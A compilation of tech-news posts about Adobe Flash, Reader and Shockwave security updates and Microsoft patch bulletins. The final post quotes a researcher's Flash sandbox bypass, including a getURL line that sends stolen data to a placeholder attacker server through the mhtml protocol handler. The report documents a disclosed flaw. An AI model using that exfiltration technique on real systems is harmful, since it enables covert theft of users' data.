Changes have been introduced, but only in select browsers at this point of time. Google Chrome for instance uses sandboxing technology and automatic updates to keep users secure. The global updater that other web browsers use on the other hand is not nearly as thorough when it comes to downloading and applying updates as soon as they get released.

Adobe today has released a new Flash preview version for the Windows operating system that contains a new feature for the Firefox web browser.

Flash Player Protected Mode aims to limit the impact of Flash based attacks in Firefox on Windows systems. The new Flash Player feature is compatible with Firefox 4.0+ on Windows Vista or higher. Only a 32-bit version of the Flash Player release is available for download.

The security mode is automatically enabled when users view Flash Player files in the Firefox web browser. Flash contents are executed in a restricted environment that prevents attacks from reaching the operating system or other applications. It is basically a sandbox comparable with Google Chrome’s sandboxing technology, Protected Mode in Adobe Reader, and Protected View in Office 2010.

Firefox users running the new version will notice that two processes are started whenever Flash contents are accessed in the web browser with Protected Mode enabled.

Adobe notes that these are the “broker and sandbox” processes which only run if Protected Mode is enabled. These are child processes of the plugin-container.exe process if enabled in the browser. Plugin-Container adds crash protection to the browser.

The Flash Player Protected Mode version for the Firefox browser has known issues. On 64-bit Windows systems for instance, a right-click on Flash contents causes Firefox to hang. Here is the list of known issues.

• Flash Access support is not enabled in this build.
• Secure Sockets are not working in this build. (3101130)
  Open and Save dialogs can hang in Windowless Mode (3096944)
• Camera streams fail to play back when encoded with the H.264/AVC codecs (3096918)
• On 64-bit Windows, Right-Clicking Flash Content cases Firefox to hang (3096953)
• Custom context menus and clipboard copy does not work (3096977)
• Local Security Dialogs are not displayed (3096714)
  When printing to “Microsoft XPS Document Writer”, the “Save File As” dialog is always minimized (3096958)
  Some Stage3D content may cause Adobe Flash Player to exit silently (#3049089)
• Closing a SecureSocket connection may block Adobe Flash Player execution and result in timeout (#3045631)
• Camera fails to play back when camera stream is being encoded with H264/AVC codec (#3049298)
• IME may not be active in Windows Vista at times between browser sessions (#3055127)
• In SandBox Stand-Alone Player, some menu items in the Microsoft IME language bar do not respond to mouse clicks (2947549)
• Some Windows function keys such as F5 may prevent the Japanese IME candidate box to pop up (#3055096

Adventurous Firefox users find the Flash Player Incubator preview release over at Adobe Labs.

A final release version of the new Flash plugin version moves the Firefox browser security wise closer to Google Chrome.

The popular download portal Download.com for instance has also started to bundle adware with the majority of downloads they provide site users with.

Today when I was downloading the latest Adobe Shockwave Player from Adobe’s website I noticed that both the slim online installer and full installer were now offering to install a third party application as well.

Near the end of the installation you are taken to a screen that will install Norton Security Scan on the system if you do not opt-out of it.

Norton Security Scan is a free program that checks computers for potential threats. It will download the latest definition updates to the system when an online connection is available. The program detects but does not resolve the issues though. It in fact very similar to scareware in this regard, which alerts the user of serious problems on the PC to sell a product.

You can only scan the system after launch. Initiating a scan will first check for updates. You will also be notified if security and web protection is installed on the system. Only tracking cookies were detected on the system, which did not keep the program from displaying a big Fix Now button on the left side of the screen. When you press it you are taken directly to a web page where you can purchase one of Norton’s security programs.

Removal of Norton Security Scan is straightforward though. Just click on Start Menu > Control Panel > Uninstall a Program and select it for uninstallation. You need to restart the PC to complete the installation.

Looking for free alternatives that you can make use of right away? Try AVG Anti-Virus Free or Avira Free Antivirus, but keep in mind that they too may be bundling their programs with toolbars.

Flash users are asked to visit the About Flash page to check the Flash version installed on their computer.

It is alternatively possible to right-click on Flash content to see the Flash Player version in the context menu.

Adobe recommends to update Flash Player to the newest version 11.1.102.55 by downloading it from Adobe’s Flash Player Download Center. Is it alternatively possible to download Flash offline installers from the linked guide. Android users can update Flash by downloading the latest version from Android Market on their Android device. Google Chrome users do not need to run the update manually as it is automatically installed by the browser.

The security patch fixes several memory corruption, buffer overflow and stack overflow vulnerabilities in Adobe Flash Player that attackers could exploit to cause a crash on the system running Adobe Flash technologies. Code execution could then give the attacker control of the affected system.

Interested users can read the security bulletin over at the Adobe website. It offers additional information about each vulnerability found and download links to various technologies affected by the vulnerabilities.

The next big Flash release (that is Adobe Flash 11.2) will introduce automatic silent updates on Windows. This means that it will become more comfortable for Windows users to keep their installed version of Flash up to date on their system. See Flash Player 11.2 Introduces Automatic Updates for details.

Now though Adobe have signalled the beginning of the end for Flash by announcing that they are to discontinue development of the Flash player for Blackberry and Android devices.  In a press release the company signalled their the future would be HTML5 and their existing AIR runtime environment.

Our future work with Flash on mobile devices will be focused on enabling Flash developers to package native apps with Adobe AIR for all the major app stores. We will no longer adapt Flash Player for mobile devices to new browser, OS version or device configurations. Some of our source code licensees may opt to continue working on and releasing their own implementations. We will continue to support the current Android and PlayBook configurations with critical bug fixes and security updates.

Over the past two years, we’ve delivered Flash Player for mobile browsers and brought the full expressiveness of the web to many mobile devices.

However, HTML5 is now universally supported on major mobile devices, in some cases exclusively. This makes HTML5 the best solution for creating and deploying content in the browser across mobile platforms.

We will no longer continue to develop Flash Player in the browser to work with new mobile device configurations chipset, browser, OS version, etc.) following the upcoming release of Flash Player 11.1 for Android and BlackBerry PlayBook.

People’s feelings over this announcement will be mixed.  All of Adobe’s products have been criticised for having lax security over the years and Flash was no exception to this.  It was difficult to disagree with Apple’s decision not to allow Flash on their iOS operating system, no matter how much we might have liked the plug-in itself.

Flash, which was born FutureSplash, has become the bedrock of video and interactivity online.  Quite simply it is the only plug-in to have ever reached nearly 100% adoption.

Questions will also be raised over the future of Flash for OS X and Windows.  It is very likely that these too will be discontinued before too long, and probably before the launch of Windows 8.

What the future of the web will now look like with HTML5 and scripting replacing the compiled code of the SWF file format remians to be seen.  Many popular websites have been shying away from Flash in recent years to return to more traditional interface types.  It is possible that the withdrawal of Flash from the Internet won’t even be noticed as websites such as YouTube complete their transition to true HTML5.

This does mean that devices that have been waiting for the arrival of Flash, including Windows Phone, will now never see it and can begin the full move to HTML5 in earnest; Windows Phone now has an HTML5 browser with the latest update.

The auto-updater is only provided for Windows systems in Flash 11.2. Windows users who install Flash Player 11.2 or later will see the following prompt after the successful installation.

It reads:

Security updates and enhancements are periodically released for Adobe Flash Player that can be downloaded and installed automatically.

Choose your update method:

• Install updates automatically when possible (recommended)
• Notify me when updates are available
• Never check for updates (not recommended)

The first option checks for and installs Flash Player versions automatically on the operating system. Depending on the Flash version installed, this may include one (Internet Explorer version or other browser version) or even both versions if both are installed on the system.

The second option will perform the same checks for new versions. Instead of installing new versions automatically it will inform the user instead.

Flash Player will check for updates once per hour if the first or second option are selected. Adobe notes that users need to restart their web browser after an update has been installed to use the new version of Flash Player in the web browser.

The latest version of Adobe Flash Player 11.2 is available on the Adobe Labs download page. The installer is provided for all 32-bit and 64-bit operating systems that support Adobe Flash. The very same page offer downloads for the Flash Player uninstaller for 32-bit and 64-bit systems to uninstall the test version from the system again.

The update checks for new Flash versions are added as a Windows task so that no update program is running all the time on the computer system. It is likely that this new security feature will decrease the number of successful Flash player based attacks on Windows significantly. (via)

You can watch both videos below:

They both certainly look impressive. Another important feature of Flash Player 11 is native 64-bit support which previously was not available at all, if you discount the Flash Player 11 Beta phase that is. The release furthermore offers theater-quality HD video and high quality HD video conferencing.

Flash Online Installation

Users of supported operating systems and browsers can install Flash online from Adobe’s website. This installer should work for everyone except Chrome users who are automatically updated to the newest Flash version whenever it is released.

Flash 11 Offline Installers

Not every user can install Flash from Adobe’s website, for instance if the computer that Flash needs to be installed on has no direct Internet connection. Some users prefer offline installers as well.

The following links point to the Flash 11 offline installers on the Adobe website. You can download those to install them on one or multiple systems.

• Microsoft Windows: Internet Explorer 32-bit, 64-bit – Web browsers 32-bit, 64-bit
• Apple Macintosh: 32-bit, 64-bit
• Linux: 32-bit, 64-bit

Adobe Air users can download and install the latest version from the Adobe website.

Interested users find announcements of the new releases both on the Flash Player Team Blog and the Flash Platform Blog which are both hosted on the Adobe website.

Both announcements link to additional pages that offer details about some of the new technologies included in Flash Player 11 and Adobe Air 3.

You can check which version of Adobe Flash you have installed by visiting Adobe’s About page on their website. (via)

According to Adobe, attackers could use the vulnerabilities to exploit a crash to potentially take control of the attacked system. At least one of the vulnerabilities has already been detected in recent attacks, which makes the update mandatory and important on all systems. The attack is carried out over email, but Adobe points out that it can also be carried out on any website on the Internet.

The attacker basically tries to convince the user to click on a specifically prepared link to execute the attack on the user’s local computer system.

Adobe obviously recommends to update Adobe Flash Player as soon as possible to the latest version that fixes the discovered security issues.

Adobe Flash users can check their version of Adobe Flash Player on the about page over at Adobe.

Google Chrome users are the only ones who do not have to manually update Flash Player, as it is done automatically by Google Update.

Everyone else can download the most recent version of Adobe Flash Player from Adobe’s Download Center. Please note that you need to close your web browser during the installation process. Make sure that you uncheck the “Yes, install Google Chrome – optional” box on the download page unless you want to install Google Chrome as well.

You can alternatively download offline installers from the following links: for Microsoft’s Internet Explorer here, for Firefox, Opera and other browsers here.

You can access the changelog here. It lists all previous changes in Flash Player 10.3 and known issues among other things.

Vulnerabilities affect Adobe Reader X and earlier versions for Windows and Macintosh, Adobe Reader 9.4.2 and earlier for Unix, and Adobe Acrobat 10.1 and earlier for Windows and Macintosh.

Adobe as usually recommends to update Adobe Reader to the new version released today. This is Adobe Reader 10.1.1 for Windows and Macintosh, and Adobe Raeder 9.4.5 for Unix, as well as Adobe Acrobat 10.1.1 for Windows and Macintosh.

The security bulletin offers vulnerability details and download links for all Adobe Reader and Acrobat updates.

Microsoft today has released five security bulletins that affect Microsoft Windows, Microsoft Server Software and Microsoft Office. The maximum severity of all five bulletins is Important, the second highest rating available.

Windows Update is already picking up the updates online. Windows users can check for updates in their operating system to download and install the patches right now.

You find summaries for all five bulletins below. Follow the link for detailed descriptions of each security bulletin.

• MS11-070 – Vulnerability in WINS Could Allow Elevation of Privilege (2571621) – This security update resolves a privately reported vulnerability in the Windows Internet Name Service (WINS). The vulnerability could allow elevation of privilege if a user received a specially crafted WINS replication packet on an affected system running the WINS service. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.
• MS11-071 – Vulnerability in Windows Components Could Allow Remote Code Execution (2570947) – This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a legitimate rich text format file (.rtf), text file (.txt), or Word document (.doc) that is located in the same network directory as a specially crafted dynamic link library (DLL) file. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
• MS11-072 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505) – This security update resolves five privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Installing and configuring Office File Validation (OFV) to prevent the opening of suspicious files blocks the attack vectors for exploiting the vulnerabilities described in CVE-2011-1986 and CVE-2011-1987.
• MS11-073 – Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634) – This security update resolves two privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Office file or if a user opens a legitimate Office file that is located in the same network directory as a specially crafted library file. An attacker who successfully exploited either of the vulnerabilities could gain the same user rights as the logged on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
• MS11-074 – Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858) – This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft SharePoint and Windows SharePoint Services. The most severe vulnerabilities could allow elevation of privilege if a user clicked on a specially crafted URL or visited a specially crafted Web site. For the most severe vulnerabilities, Internet Explorer 8 and Internet Explorer 9 users browsing to a SharePoint site in the Internet Zone are at a reduced risk because, by default, the XSS Filter in Internet Explorer 8 and Internet Explorer 9 helps to block the attacks in the Internet Zone. The XSS Filter in Internet Explorer 8 and Internet Explorer 9, however, is not enabled by default in the Intranet Zone.

You find deployment priority information and the severity index at the Technet blog.

All security issues have received the maximum severity rating of critical, with the exception of the one for RoboHelp which received one of important instead.

The Flash Player update fixes several critical vulnerabilities in all Adobe Flash Player versions for Windows, Macintosh, Linux, Solaris and Android. Versions that are affected by the vulnerability are Flash Player 1.0.3.181.36 and earlier on all supported systems (Android 10.3.185.25 and earlier).

A successful exploit of a vulnerability could cause a crash and the successful taking control of the system in the process.

Adobe recommends that all users update Adobe Flash Player as soon as possible to protect their operating system and data from exploits.

The latest version of Adobe Flash Player can be downloaded from Adobe’s Download Center or in the case of Android from the Android Marketplace.

Windows users can furthermore use the Flash Player Settings Manager that is part of the Windows Control Panel to check for updates. Here it is furthermore possible to check the Flash Player version that is installed on the system. The path is Control Panel > Flash Player (32-bit) > Advanced. Users with a 64-bit version of Flash Player installed need to change the 32-bit to 64-bit in the path.

Additional information about the Flash Player vulnerabilities are available on Adobe’s security bulletin page.

Google Chrome users, who do not have Flash installed separately, have received an update by now that has updated their internal version of Flash to the latest version.

Happy updating everyone.

Probably the biggest new feature in the beta is native 64-bit support for 64-bit Windows operating systems. While still in beta, it marks a milestone in the 64-bit development of Flash, as the beta release indicates that 64-bit support might be added to the final version of Flash 11.

Users with the intention to download the 64-bit version of Flash beta need to know that it can only be run in a 64-bit web browser. That’s Internet Explorer mostly, and some custom compiled versions of the Firefox web browser. Users who run a 64-bit browser can install the 64-bit version of Flash normally on their system, provided that it is a 64-bit operating system as well. To sum it up: You need a 64-bit OS, a 64-bit web browser to install the 64-bit version of Flash 11 Beta.

What else is new in Flash 11? Adobe lists the following features on the Adobe Labs page: Stage3D APIs, G.711 audio compression for telephone, H264/AVC SW Encoding, Socket Progress Events and HD Surround Sound.

Adobe® Flash® Player 11 desktop beta drives innovation for rich, engaging digital experiences with new features for cross-platform browser-based viewing of expressive rich internet applications, content, and videos across devices. Some of the features from the Flash Player Incubator, such as Stage 3D and 64-bit support, have been moved into this beta release.

While useful to some users, they might not be relevant for the majority of Flash users at this point in time. Flash 11 Beta could be more interesting to developers who may have plans to integrate one or some of the new features into their applications.

Interested users can download 32-bit and 64-bit editions of Flash 11 Beta from the Adobe website. The new version is available for Windows, Linux and Macintosh computer systems. The download page links to 32bit and 64bit Flahs uninstallers, for users who need to go back to version 10 of Flash.

Adobe, the company behind popular technologies such as Flash Player, Shockwave or Adobe Reader released five security bulletins on the same day after teaming up with Microsoft to coordinate security releases.. Of the five, three may be affecting end users as they address vulnerabilities in Adobe Reader and Acrobat, Shockwave Player and Flash Player. All three have received a maximum severity rating of critical, the highest possible rating.

The bulletin APSB11-16 describes a critical vulnerability in Adobe Reader X 10.0.3 and earlier on Windows, and Adobe Reader X 10.0.3 and earlier on Macintosh, as well as earlier versions of Adobe Reader 9 and 8, and Adobe Acrobat 9 and 8. The vulnerability could be exploited by attackers to crash the application to take control of the computer system Adobe Reader X is running on.

Adobe recommends to update the software product to the latest available version. For Adobe Reader X that would mean to update to version 10.1, for users of Adobe Reader 9.4.4 and earlier to update to version 9.4.5.

Adobe Reader and Acrobat users can check for updates in the program interface. This is done via Help > Check for Updates. Updates can also be downloaded from the following locations.

• Adobe Reader Windows
• Adobe Reader Macintosh

You can also check out Adobe Reader X Offline Installers

Security Bulletin APSB11-17 describes vulnerabilities in Adobe Shockwave Player 11.5.9.620 and earlier on the Windows and Macintosh platform. Attackers who successfully exploit the vulnerabilities could run malicious code on the computer system. Adobe recommends to update Shockwave Player to version 11.6.0.626 to protect the system from possible exploits.

Windows and Mac users who run Shockwave Player on their system can download the latest version at the official download site.

Bulletin APSB11-18 finally describes a vulnerability in Adobe Flash Player that affects Adobe Flash Player 10.3.181.23 and earlier on Windows, Macintosh, Linux and Solaris, as well as Flash Player 10.3.185.23 and earlier for Android.

The vulnerability could be exploited to cause a crash which could allow the attacker to gain control over the affected system. Adobe has confirmed reports that the vulnerability is exploited in the wild in the form of targeted attacks on specifically prepared websites.

Adobe recommends to update Flash Player to Adobe Flash Player 10.3.181.26 on desktop operating systems. Android users will receive a patch before week’s end.

Users can verify their installed version of Flash Player by visiting the About Flash Player page at Adobe.

Adobe lists the latest version for all supported operating systems on the page, so that users only need to compare their installed version with the latest available version to see if they need to update.

The latest versions can be downloaded from Adobe’s Flash Player Download Center. Users who do not want to use the download manager can check out this guide Download Adobe Flash Without Adobe Download Manager.

Google Chrome users can check for updates in Chrome to get the latest version. This is done by clicking on the wrench icon and selecting About Google Chrome.

We have covered all new features of Flash Player 10.3 when the first beta was released in March, and those information are still valid.

Adobe Flash Player 10.3.181.14 fixes several security issues, next to the new features that have been added by Adobe.

The vulnerabilities affect all supported operating systems and have received a critical rating by Adobe. Users are encouraged to update their version of Flash to the new release as soon as possible.

Critical vulnerabilities have been identified in Adobe Flash Player 10.2.159.1 and earlier versions (Adobe Flash Player 10.2.154.28 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.2.157.51 and earlier versions for Android. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system. There are reports of malware attempting to exploit one of the vulnerabilities, CVE-2011-0627, in the wild via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. However, to date, Adobe has not obtained a sample that successfully completes an attack. (via)

The new handling of so called Flash cookies in web browsers is probably the most important feature from an end-user’s perspective. Before Flash Player 10.3, you were not able to delete those cookies from within the browser interface. Even if you’d select to delete all cookies, you’d only delete HTTP cookies and not cookies created by Flash.

With the new system in place, browser developers can integrate the cleaning of Flash cookies right into the temporary files and history cleaning of the web browser.

Another interesting addition is the integration of Flash Player in the operating system’s Control Panel. Windows, Mac and Linux users find a Flash entry in the control panel which they can use to configure Adobe’s Flash Player.

Users can make use of the new settings manager to manage local storage settings, camera and microphone permissions and peer-assisted networking permissions. It furthermore can be used to check for updates manually, and block the automatic update checks.

A delete all button is offered under Browsing Data and Settings which removes all Flash related settings and data across all browsers on the computer.

Flash Player 10.3 Direct Download Links

You can download Flash from the official Get Adobe Flash website as well.

The vulnerability, according to Adobe’s information could be exploited to cause a crash on the user system that could allow the attacker to take control of the operating system. Reports that the vulnerability is actively exploited by embedding specifically prepared Flash files in Word and Excel documents have been confirmed by Adobe.

There are reports that this vulnerability is being exploited in the wild in targeted attacks via a malicious Web page, or a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment, targeting the Windows platform

Google Chrome users do not need to update Adobe Flash unless they have Flash installed separately on their system as well. This can for instance be the case if other web browsers are used or installed on the system as well.

The easiest way to find out if your Flash Player is up to date is to visit the About Flash page over at Adobe. The currently installed version and the latest version are displayed on that page.

Downloads are provided at the Flash Player Download page which automatically displays the correct download for the browser used to open the web page, or by manually downloading the Flash Player updates from the Flash Player Support Center.

Flash Player versions affected by the vulnerability are the following:

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux, and Solaris operating systems
Adobe Flash Player 10.2.154.25 and earlier versions for Chrome users
Adobe Flash Player 10.2.156.12 and earlier for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

The now released update of Adobe Flash Player is version 10.2.159.1 on all supported operating systems, and 10.2.154.27 if the Flash version of the Google Chrome browser is checked.

Affected are more or less all Flash users. This includes Flash installations on Windows, Mac and Linux, the built-in Flash Player of the Google Chrome browser, Flash on Android and Flash in Adobe Reader and Acrobat.

• Flash Player 10.2.153.1 and earlier versions on Windows, Mac, Linux, Solaris
• Adobe Flash Player 10.2.154.25 and earlier for Chrome
• Adobe Flash Player 10.2.156.12 and earlier versions for Android
• Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems

Adobe confirmed reports that the vulnerability is actively exploited. The vulnerability uses embedded Flash files in Microsoft Word documents to exploit the issue. According to Adobe’s information those are delivered as email attachments and targeting the Windows platform.

Adobe Reader and Acrobat do not appear to be targeted right now. Adobe Reader X users are protected from this exploit by the program’s Protected Mode.

Adobe is currently finalizing a schedule for delivering updates for all affected versions of Flash Player except for Adobe Reader X which will receive the update on the next quarterly security update on June 14, 2011.

How can users protect their system from these kind of attacks? You should be cautious when you receive document attachments, especially if they come from unknown senders. Probably the best option in this case is to save those attachments to the computer, and open them in an online viewer such as Google Docs.

You could alternatively use a third party document viewer that does not support Flash, but the safest bet is an online viewer.

Interested users find additional information about the newly discovered Flash vulnerability at the Adobe Security Bulletin.

The critical vulnerability affects Adobe Flash, and since Adobe implemented Flash technology in Adobe Reader and Acrobat, those products as well.

The Flash vulnerability affects all Adobe Flash Player 10.2.152.33 and earlier versions on all supported operating systems, as well as Flash Player 10.2.154.18 and earlier for Chrome, Flash Player 10.1.106.16 and earlier for Android and Adobe AIR 2.5 and earlier. Google recently pushed an update that resolved the vulnerability for Chrome.

Attackers can exploit the vulnerability to cause a crash which could allow them to take control over the affected system. We already mentioned in our first report on March 14 that the issue was actively exploited by attackers in the form of embedded Flash files in Microsoft Excel documents that were delivered as email attachments.

The Flash Player update is available on the official Flash download page over at Adobe. Google Chrome users with automatic updates enabled do not need to download the update as Google has already pushed an update to all Chrome users that updated Flash to the latest version.

The new Flash version is 10.2.153.1 for all supported desktop PCs, 10.2.156.12 for Android and 10.2.154.25 for Google Chrome.

Adobe AIR users can download the new version of the application from the official Adobe AIR download center, the new Adobe Air version is 2.6.

Users can verify their version of Adobe Flash by visiting the About Adobe Flash Player page.

The Security Bulletin that lists additional information is accessible here.

Adobe has released an update for Adobe Reader and Acrobat as well to address the same critical security vulnerability. Adobe Reader and Acrobat X, 10.x and 9.x are affected on Windows and Macintosh systems.

Existing Adobe Reader and Adobe Acrobat users can use the built-in updating functionality to update the software to the latest version. They need to open Adobe Reader and select Help > Check for Updates from the menu to initiate that process.

It needs to be noted that Adobe is not supplying an update for Adobe Reader X at this point in time. The reasoning is that Adobe Reader X is using Protected Mode which “would prevent an exploit of this kind from executing”. The update will be addressed on the coming quarterly security update which is scheduled for June 14.

The security bulletin lists additional information about the vulnerability, and download links that point to the latest program versions of affected applications.

Adobe has confirmed reports that the vulnerability is actively exploited via swf files that are embedded in Microsoft Excel files that are delivered via email attachments. A successful exploit causes a crash of the application and could give an attacker control over the computer system.

A security fix is in the final stages of development, and Adobe estimates that it can be distributed during the next week. Computer users for now should be very cautious when they receive emails with Excel attachments, especially if the sender is unknown. It may be a good idea to open the documents online, for instance via Google Docs instead of a desktop client to block potential attacks.

Protected Mode of Adobe Reader X mitigates the issue according to Adobe, so that the security fix for that version will be delivered with the quarterly security update that is scheduled for June 14.

In short:

• All Flash Player versions 10 are affected for all supported desktop and mobile operating systems.
• All versions of Adobe Reader and Acrobat X, 10 and 9 are affected
• The vulnerability is exploited via Excel email attachments that have a Flash file embedded.
• A patch will be delivered in the next week

Additional information are available at the Security Advisory over at Adobe’s website.

Adobe Flash’s dominant position lately has become under attack by new emerging technologies. The rise of HTML5, and supported technologies, could seriously impact the dominance of Flash in coming years.

Adobe as a response has increased their efforts to improve the Flash Player. The latest development version, Adobe Flash Player 10.3 Beta, has been made available recently for all supported operating systems.

Flash Player 10.3 Beta introduces several new features, of which at least two have been requested by privacy conscious users for a very long time.

Adobe’s introductory page lists the following new features of Flash Player 10.3:

• Media Measurement
• Acoustic Echo Cancellation
• Integration with browser privacy control for local storage
• Native Control Panel
• Auto-Update Notification for Mac OS

The most interesting new feature from a privacy and security standpoint is called “integration with browser privacy control for local storage”.

Web browsers up until now did not have an option to delete local Flash storage, commonly referred to as Flash cookies. Users either had to use Adobe’s inflexible online control panel, third party software or manual options to remove Flash data from the system (see Four Options To Deal With Flash Cookies).

Adobe started to integrate access to local storage, or more precisely the ability to clear local storage, directly in the web browser with the latest beta release of Flash. The release notes state that it will be available first in Mozilla Firefox 4 and Internet Explorer 8, and at a later point in time released for Apple Safari and Google Chrome. The document does not mention the Opera web browser at all.

The current beta version does not seem to add the controls to the web browsers yet. A test with the latest Firefox 4 Minefield release revealed no new options. Adobe states that the integration with Internet Explorer is not available yet as well, but will be enabled in a future beta update.

The feature itself improves the privacy of the user. That’s great. It is not so great that Adobe does not seem to have it included at all in the first beta version of the browser.

The Native Control Panel is the second addition for Windows, Mac and Linux; It improves the management of Flash settings on those operating systems. Flash Player 10.3 will add controls to manage privacy, security and storage settings directly in the control panels of the operating systems. That feature however is not enabled in the beta as well.

Media Measurement provides integration of video analytics into Flash which gives companies and producers information about the audience and video distribution.

Acoustic Echo Cancellation gives developers additional options at hand to improve peer-to-peer communication with Flash Player. New features include noise suppression, voice activity detection, acoustic echo cancellation and automatic compensation for microphone input levels.

Verdict

The new Flash Player features look might fine on paper, but since half of them are developer features that need to be added to flash contents, and the other half features that are not enabled yet, it makes little sense for end users to download and install Flash Player 10.3 beta.

If you do not want to wait, you find downloads for all Flash Player 10.3 beta releases at Adobe Labs.

Update: The Flash Player Settings Manager appeared in the Control Panel after uninstalling and installing the latest Flash Player beta and restarting the Pc.

The applet Flash Player (32-bit) consists of the four tabs Storage, Camera and Mic, Playback and Advanced. Take a look at the screenshots below for a first impression of the feature.

The storage settings can be configured in the Storage tab. Here it is possible to allow or block all sites, or configure Adobe Flash to always ask when a site wants to save information on the computer. The button Locale Storage Settings by Site opens a new window that lists all websites and servers that are storing data on the PC. Options available there are to delete individual entries and to change the permissions of the host. The Delete all button in the main interface deletes all data that is currently stored on the system.

Camera and Mic allows to block all sites from using the camera and microphone or configure Flash Player to ask whenever a site wants to access the devices. The Camera and Microphone Settings by Site button opens a new window to allow or block access from specific sites.

Peer-assisted networking is configured under Playback. Here it is possible to block all sites from using peer-assisted networking. The default setting displays a confirmation dialog whenever a site wants to make use of the technology. It is again possible to configure rules for specific sites with a click on the Peer-assisted Networking Settings by Site button.

The advanced settings finally display a Delete All button to delete all local storage, saved choices, settings and other data used by content in Flash Player across all browsers on the computer. It is possible to change the update settings from automatic updates to never check for updates. The Check Now button can be used to check for updates manually.

The two remaining options are to specify trusted location settings for developer testing, and to deauthorize the computer which prevents Flash from playing previously viewed protected contents.

Adobe has placed several web links in the control panel applet that open documentation pages. Follow this link to open the start page of the Native Control Panel documentation.

The security update for Adobe Flash Player fixes several critical vulnerability in Flash Player 10.1.102.64 and earlier on Windows, Macintosh, Linux and Solaris. Successful exploits could “cause the application to crash and could potentially allow an attacker to take control of the affected system”.

The update increases the version of the application to Adobe Flash Player 10.2.152.26 on all affected systems.

The update can be downloaded directly from Adobe.

More information about the update are available on Adobe’s Security Bulletin page.

Adobe Reader, Acrobat

Critical vulnerabilities have also been identified in Adobe Reader and Acrobat. Affected versions include Adobe Reader X, Adobe Reader 9.4.1 for Windows, Macintosh and Unix, and Adobe Acrobat X and earlier for Windows and Macintosh. Please note that the update incorporates the Adobe Flash Player update.

The vulnerabilities “could cause the application to crash and potentially allow an attacker to take control of the affected system. Risk for Adobe Reader X users is significantly lower, as none of these issues bypass Protected Mode mitigations”.

Updates are available to increase the version of Adobe Reader X to 10.0.1, Adobe Reader 9.4.1 to 9.4.2 and Adobe Acrobat X to 10.0.1.

Download links for all affected applications are posted on the security bulletin page over at Adobe.

The Microsoft Security Bulletin Advance Notification for February 2011 details the upcoming patches. A total of 12 security bulletins are released next Tuesday of which all but one fix issues in the Microsoft Windows operating system. The remaining patch fixes a vulnerability in Microsoft Office.

Three of the security vulnerabilities have received a maximum severity rating of critical, the highest available rating, the remaining nine a severity rating of important.

• Microsoft’s newest operating system Windows 7 is affected by seven of the twelve issues. Of those, two are rated critical and the remaining five as important.
• Windows Vista is affected by six vulnerabilities with three rated as critical and the remaining three as important.
• Windows XP is affected by eight vulnerabilities with two being rated as critical and six as important.
• Windows Server 2003 is affected by 10 vulnerabilities of which one is critical, eight are important and one is moderate.
• Windows Server 2008 is affected in the same way as the Vista operating system, with the exception that one of the critical vulnerabilities is only rated as moderate here.
• Windows Server 2008 R2 finally is affected the same way as Windows 7, again with the exception of two vulnerabilities that are rated as moderate instead of critical and important.

The remaining vulnerabiliy affected Microsoft Visio 2002 Service Pack 2, Visio 2003 Service Pack 3 and Visio 2007 Service Pack 2. It is rated as important.

The advanced notifications are accessible here.

Adobe

Adobe has released a Prenotification Security Advisory for Adobe Reader and Acrobat.

Adobe is planning to release updates for Adobe Reader X (10.0) for Windows and Macintosh, Adobe Reader 9.4.1 and earlier versions for Windows, Macintosh and UNIX, Adobe Acrobat X (10.0) for Windows and Macintosh, and Adobe Acrobat 9.4.1 and earlier versions for Windows and Macintosh to resolve critical security issues. Adobe expects to make updates for Windows and Macintosh available on Tuesday, February 8, 2011. An update for UNIX is expected to be available by the week of February 28, 2011.

Expect lots of patching next Tuesday. We will post detailed information once the patches are released by Microsoft and Adobe.

He found out that SWFs that are loaded from a local file can in fact bypass the sandbox by passing “the contents to the attacker server via getURL() and a url like: file://..”. That however can only be used to pass IPs and hostnames and no other data.

Data can however be send to a remote server on the Internet as well. A solution was quickly discovered; Adobe is blacklisting protocol handlers (via) which means that Flash Player will block some protocols (like JavaScript://) while allowing others (like mailto://). While it is theoretically possible to bypass the blacklist, an even easier solution is to find a protocol that is currently not included in the list.

Billy Rios found the mhtml protocol:

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

The request goes over http/https and port 80/443 so it will get past most egress filtering
If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
The protocol handler is available by default on Win7 and will launch with no protocol handler warning

Attackers need to create a Flash file that they add the mhtml request to. Users then would need to execute the file on their computer system. How does it get there? For instance by email or as part of a virus attack. (via)